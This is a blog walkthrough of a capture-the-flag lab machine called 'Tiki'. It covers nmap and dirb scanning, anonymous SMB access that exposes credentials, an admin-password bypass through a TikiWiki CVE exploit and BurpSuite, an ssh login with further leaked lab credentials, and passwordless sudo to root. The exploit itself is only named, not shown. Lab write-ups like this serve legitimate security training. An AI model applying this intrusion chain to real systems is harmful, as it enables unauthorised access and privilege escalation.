Tiki Walkthrough

Start by scanning the host with “nmap -A -T4 -p- 192.168.1.17 -vv”

Now run “dirb http://192.168.1.17 /usr/share/dirb/worlist/big.txt

We get some interesting results but I’m interested in http://192.168.1.17/tiki/tiki-index.php as we can login from there, but first we need a username and a password.

I ran some tests like searching for exploits on tikiwiki using “Searchsploit” and ran “nikto” but nothing interesting came up, so now it’s time to run “enum4linux” as port 139 and 445 are open:

Now we got something, there is “Notes” shared where we can access it:

Using “smbclient \\\\192.168.1.17\\Notes” we can access the shared drive without any password, we can see there is a file “Mail.txt” and we can download it with “get Mail.txt” and view it on our machine.

We got a username “Silky” and password “51lky571k1” and we can use it to login to the tikiwiki panel:

Now in the panel can’t find anything useful to exploit or to upload some kind of reverse shell till i found this page with a massage:

So, what i did is searched online for the latest CVE for tikiwiki and found this exploit:

Downloaded the exploit and ran it:

And i got this output:

The password for the admin is removed and i can login into admin without a password using BurpSuite, so let’s start BurpSuite:

This is the output from BurpSuite login page, then send the result to “Repeater” and remove the password and click send:

Now click refresh on the page or return and we logged in as admin:

I kept looking for a way to upload a file as reverse shell but no use, so at last i found this page where there is a credentials for the user “silky”:

silky:Agy8Y7SPJNXQzqA

I can now ssh with it:

Right after we log in, we can see that the user “silky” can run “sudo” without any password at all, so we “sudo su” and become root and catch the flag:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s